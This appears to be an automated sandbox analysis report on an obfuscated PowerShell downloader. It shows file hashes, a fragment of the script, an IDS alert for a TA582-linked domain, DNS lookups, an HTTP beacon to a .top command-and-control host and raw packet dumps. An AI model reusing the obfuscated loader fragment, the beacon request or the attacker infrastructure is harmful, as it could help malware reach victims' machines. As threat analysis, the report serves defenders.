Preview:	...................................FL..................F.".. ...d......x...=..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....1...=...!...=......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlwYuy....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....wYwy..Roaming.@......DWSlwYwy....C.......................0.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlwYuy....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlwYuy....E.....................J...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlwYuy....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlwYuy....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlwY{y....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\82Q4PFWOKMYG9L6IJHQX.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.688072079024628
Encrypted:	false
SSDEEP:	48:WJXaXXCcbU2K+PoukvhkvklCywdn2BAsslzOSogZowhAsslWOSogZok1:oXOXChoJkvhkvCCtYAssRHHAsseH7
MD5:	E7B303692AF594A9DFD528959D93BCC6
SHA1:	1ED9AB3950DFFD92D8C048458E3F5C5DEA11B070
SHA-256:	4C8B223D82855EAD6B56CEECD1FA7E08B1BC1233C406F87E3276EC2F2D143DE1
SHA-512:	CB9D04C56DFA39190C363DDB84FA2FEFCDDCB50AA14073B3ECBE7C664423DECCC75706B528ACEDA5169273B0FEF51BFB3B33B034722918B6C132B617FD8CFA58
Malicious:	false
Preview:	...................................FL..................F.".. ...d......x...=..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....1...=...!...=......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlwYuy....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....wYwy..Roaming.@......DWSlwYwy....C.......................0.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlwYuy....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlwYuy....E.....................J...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlwYuy....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlwYuy....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlwY{y....q...........

Static File Info

General

File type:	ASCII text, with very long lines (11455), with CRLF line terminators
Entropy (8bit):	5.969069712864957
TrID:
File name:	download.ps1
File size:	21'024 bytes
MD5:	5ba58271503fe53a244fc74172ea33c7
SHA1:	74f1632891bf47872873ab34053b49e015ee6921
SHA256:	f801217a2f1f7e2677a39476875b8b5cdb8b41dea3fe7255a3fb9806551b78c5
SHA512:	f8bc27828ff502d1c3c1bb3c12304060139b541f0032c0ca9602cf79722819c0893a80d75e73f3a30378fe49c70b19979f7ef8f2994d334ec9c14d234f6f6eb7
SSDEEP:	384:0V6qyv8hrdG5EYEA6AwyrIWSKT5iFNwPMrIUvzG4NdOEx5pWgk29Q9x0zQlo:0VRrdc6AwyrICiXIMrtS4NEEx9k29Q9+
TLSH:	18929FD2BB89DCB506CFC52E5501FC047E99746FE4DBAAC072E8CAD163426415D2ACC3
File Content Preview:	$ydklqpi=$executioncontext;$isaledisiseronenerentionedrereer = ([ChaR[]]@((-3774+(20776783/(2066+(12866-9503)))),(2526-2474),(-5498+5555),(349950/6999),(-2566+2622),(-3057+3111),(4941-(14583-(11918842/1229))),(415800/7560),(9111-9056),(660-(3917-3307)),(1

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T16:11:58.680285+0100	2859125	ETPRO MALWARE TA582 Domain in DNS Lookup	1	192.168.2.5	52208	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 16:11:58.925096035 CET	49704	80	192.168.2.5	168.100.10.140
Nov 23, 2024 16:11:59.044805050 CET	80	49704	168.100.10.140	192.168.2.5
Nov 23, 2024 16:11:59.044872999 CET	49704	80	192.168.2.5	168.100.10.140
Nov 23, 2024 16:11:59.047883987 CET	49704	80	192.168.2.5	168.100.10.140
Nov 23, 2024 16:11:59.167382002 CET	80	49704	168.100.10.140	192.168.2.5
Nov 23, 2024 16:12:00.723671913 CET	80	49704	168.100.10.140	192.168.2.5
Nov 23, 2024 16:12:00.775599957 CET	49704	80	192.168.2.5	168.100.10.140
Nov 23, 2024 16:12:00.867608070 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:00.987502098 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:00.988548994 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:00.988713980 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:01.108227968 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868273973 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868294954 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868304014 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868315935 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868343115 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868356943 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:02.868361950 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868371964 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868382931 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868397951 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868412971 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.868520021 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:02.868520021 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:02.868520021 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:02.987886906 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.987907887 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:02.988101959 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.069339991 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.069391012 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.069446087 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.074074030 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.074089050 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.074189901 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.081926107 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.084301949 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.084351063 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.084400892 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.092669010 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.092751026 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.093857050 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.093995094 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.094055891 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.102212906 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.103514910 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.103557110 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.103581905 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.111879110 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.112023115 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.115401030 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.115504980 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.115571022 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.121445894 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.129000902 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.129093885 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.129101038 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.133184910 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.133332968 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.147368908 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.147522926 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.147680044 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.188996077 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.189105988 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.189263105 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.193156004 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.244457960 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.270648003 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.270790100 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.270879030 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.274822950 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.274961948 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.275094986 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.283283949 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.283375025 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.283437967 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.291610003 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.291714907 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.291760921 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.300019026 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.300029039 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.300086975 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.304816008 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.304939032 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.304976940 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.313235044 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.313323021 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.313384056 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.321641922 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.321765900 CET	80	49705	142.250.181.68	192.168.2.5
Nov 23, 2024 16:12:03.321816921 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.555484056 CET	49705	80	192.168.2.5	142.250.181.68
Nov 23, 2024 16:12:03.556209087 CET	49704	80	192.168.2.5	168.100.10.140

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 16:11:58.680284977 CET	52208	53	192.168.2.5	1.1.1.1
Nov 23, 2024 16:11:58.905599117 CET	53	52208	1.1.1.1	192.168.2.5
Nov 23, 2024 16:12:00.727988958 CET	53418	53	192.168.2.5	1.1.1.1
Nov 23, 2024 16:12:00.865031958 CET	53	53418	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 16:11:58.680284977 CET	192.168.2.5	1.1.1.1	0x7a80	Standard query (0)	bkkeiekjfcdaaen.top	A (IP address)	IN (0x0001)	false
Nov 23, 2024 16:12:00.727988958 CET	192.168.2.5	1.1.1.1	0xd295	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 16:11:58.905599117 CET	1.1.1.1	192.168.2.5	0x7a80	No error (0)	bkkeiekjfcdaaen.top		168.100.10.140	A (IP address)	IN (0x0001)	false
Nov 23, 2024 16:12:00.865031958 CET	1.1.1.1	192.168.2.5	0xd295	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bkkeiekjfcdaaen.top

www.google.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	168.100.10.140	80	6392	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 16:11:59.047883987 CET	217	OUT	GET /sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bkkeiekjfcdaaen.top Connection: Keep-Alive
Nov 23, 2024 16:12:00.723671913 CET	166	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 23 Nov 2024 15:12:00 GMT Content-Length: 0 Connection: keep-alive Location: http://www.google.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	142.250.181.68	80	6392	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 16:12:00.988713980 CET	159	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Nov 23, 2024 16:12:02.868273973 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 15:12:02 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-OASJokzcCNUxFTa_kWrbyg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AZ6Zc-X45NHDSO0q7vGlDPWWDjOqsfarHS2WQlgzUkSBVdZWunXvJFMq99k; expires=Thu, 22-May-2025 15:12:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=519=YfZOOcCEz1i3oo0EVM_iNV6cvLG2Aahez2SXgUAH20tU5L-YdiM0SalHa8KezUhL0K1NGOfVsO97jgF5m9oMb0mfhIY0ynZyurHzJfNjtR1SsCJ9uz7ODMl8o_gQ2WsG8Co16wJWqhl5vVR91uPNVLEfTBWdH6TTudaTGYaVwKRWOhKTNmcToIPzDjBYlo1E70CC5Ylmgg; expires=Sun, 25-May-2025 15:12:02 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 34 34 66 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 Data Ascii: 44ff<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
Nov 23, 2024 16:12:02.868294954 CET	1236	IN	Data Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/
Nov 23, 2024 16:12:02.868304014 CET	1236	IN	Data Raw: 2c 32 36 33 32 2c 31 2c 31 33 36 30 2c 31 38 37 2c 31 33 31 2c 31 34 36 31 2c 33 30 32 2c 33 32 31 2c 34 2c 32 2c 32 38 31 2c 34 37 33 2c 37 37 35 2c 36 2c 32 2c 31 39 32 2c 33 34 36 2c 32 2c 32 30 34 2c 33 2c 31 30 32 39 2c 34 37 37 2c 31 2c 31 Data Ascii: ,2632,1,1360,187,131,1461,302,321,4,2,281,473,775,6,2,192,346,2,204,3,1029,477,1,1754,2,1072,1401,608,1623,144,197,426,461,122,612,648,110,328,208,93,3170,191,1189,845,1158,351,707,415,127,31,348,343,71,465,762,914,635,2,512,2,92,262,608,849,5
Nov 23, 2024 16:12:02.868315935 CET	1236	IN	Data Raw: 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 22 68 74 74 70 73 3a 22 26 26 28 67 6f 6f 67 6c 65 2e 6d 6c 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 45 72 72 6f 72 28 22 61 22 29 2c 21 31 2c 7b 73 72 63 3a 61 2c 67 6c 6d 6d 3a 31 7d 29 2c 61 3d 22 Data Ascii: ation.protocol==="https:"&&(google.ml&&google.ml(Error("a"),!1,{src:a,glmm:1}),a="");return a}function r(a,b,d,c,h){var e="";b.search("&ei=")===-1&&(e="&ei="+n(c),b.search("&lei=")===-1&&(c=p(c))&&(e+="&lei="+c));var f=b.search("&cshid=")===-
Nov 23, 2024 16:12:02.868343115 CET	1236	IN	Data Raw: 76 61 72 20 6b 3b 28 6b 3d 67 6f 6f 67 6c 65 29 2e 6c 78 7c 7c 28 6b 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 76 61 72 20 6c 3d 5b 5d 2c 6d 3b 28 6d 3d 67 6f 6f 67 6c 65 29 2e 66 63 65 7c 7c 28 6d 2e 66 63 65 3d 66 75 6e 63 74 69 6f Data Ascii: var k;(k=google).lx\|\|(k.lx=function(){});var l=[],m;(m=google).fce\|\|(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(function(){document.documentElement.addEventListener("submit",function(b){var a;if(a=b.ta
Nov 23, 2024 16:12:02.868361950 CET	1236	IN	Data Raw: 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 30 7d 23 67 62 78 33 7b 6c 65 66 74 3a 30 7d 23 67 62 78 34 7b 72 69 67 68 74 3a 30 7d 23 67 62 62 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 62 77 7b 6c 65 66 74 3a Data Ascii: dth:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opa
Nov 23, 2024 16:12:02.868371964 CET	1236	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 33 70 78 20 33 70 78 20 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 70 78 Data Ascii: ;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position
Nov 23, 2024 16:12:02.868382931 CET	1236	IN	Data Raw: 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 Data Ascii: es/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-co
Nov 23, 2024 16:12:02.868397951 CET	1236	IN	Data Raw: 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 Data Ascii: adding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.g
Nov 23, 2024 16:12:02.868412971 CET	1236	IN	Data Raw: 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 Data Ascii: rder-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-
Nov 23, 2024 16:12:02.987886906 CET	1236	IN	Data Raw: 67 62 70 6d 63 20 2e 67 62 70 6d 74 63 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 7d 23 67 62 70 6d 7b 62 6f 72 64 65 72 3a 30 3b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 Data Ascii: gbpmc .gbpmtc{padding:10px 20px}#gbpm{border:0;border-collapse:collapse;border-spacing:0;margin:0;white-space:normal}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{white-space:nowrap}.gbpms2{font-weight

Target ID:	0
Start time:	10:11:52
Start date:	23/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:11:52
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF849162BD4 Relevance: 4.8, Strings: 3, Instructions: 1053COMMON

Download Yara Rule

Strings

6a, xrefs: 00007FF849162BD8
6a, xrefs: 00007FF849163052
6a, xrefs: 00007FF849162EBD

Memory Dump Source

Source File: 00000000.00000002.2189056444.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849160000_powershell.jbxd

Similarity

API ID:
String ID: 6a$6a$6a
API String ID: 0-2622369933
Opcode ID: 955891ddb48bc014c07c8cf0fe666f9f9762cff706238a0fc95aebac25e64efb
Instruction ID: 80c6e613105e4e76c97a3707fcfff1e675a08a309ec626ee06ff39eeea9fbe56
Opcode Fuzzy Hash: 955891ddb48bc014c07c8cf0fe666f9f9762cff706238a0fc95aebac25e64efb
Instruction Fuzzy Hash: E7620371E0DACA5FE7A7AB2858555B47FE1EF563A0B0801FEC08DC7193DA18AC078752

Function 00007FF848F47206 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab10ce18ffb4c8b69fcd0da6f2d980a22a60b40706e805f10a3db3520b02ff47
Instruction ID: 80e8fa102e10079e0e2902c9201d2e7f719999ad908891ba5d75c8151c53153c
Opcode Fuzzy Hash: ab10ce18ffb4c8b69fcd0da6f2d980a22a60b40706e805f10a3db3520b02ff47
Instruction Fuzzy Hash: 1BF1833090CA8D8FEBA8EF28C8557F937D1FF64750F04426AE84DC7295DB34A9458B86

Function 00007FF848F47FB2 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de122b6b04623225bafacc3d2d6feb80c28f60369c8882b54e5889ba2732364f
Instruction ID: d2441301f80ccd8f4c26e0033ebf2c5389f64bea2059d3c32632f8e47970e2bd
Opcode Fuzzy Hash: de122b6b04623225bafacc3d2d6feb80c28f60369c8882b54e5889ba2732364f
Instruction Fuzzy Hash: 71E1C23091CA8E8FEBA8EF28C8557E937D1FF64750F44426AD84DC7291DF78A9448B81

Function 00007FF8491A4A89 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189588591.00007FF8491A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8491a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507d9c58c7acc1b0c6d402374bd43e0feca3f8d38a934e7144d075e51cd62105
Instruction ID: be85074c95066292963a91f13f415624eacb5b317799687881ba84df30245aee
Opcode Fuzzy Hash: 507d9c58c7acc1b0c6d402374bd43e0feca3f8d38a934e7144d075e51cd62105
Instruction Fuzzy Hash: 8CC1E43190EBC98FEBA5EF2888556647BA1EF66364B1800FED04DCB5C3DA2DAC45C741

Function 00007FF848F47BC6 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

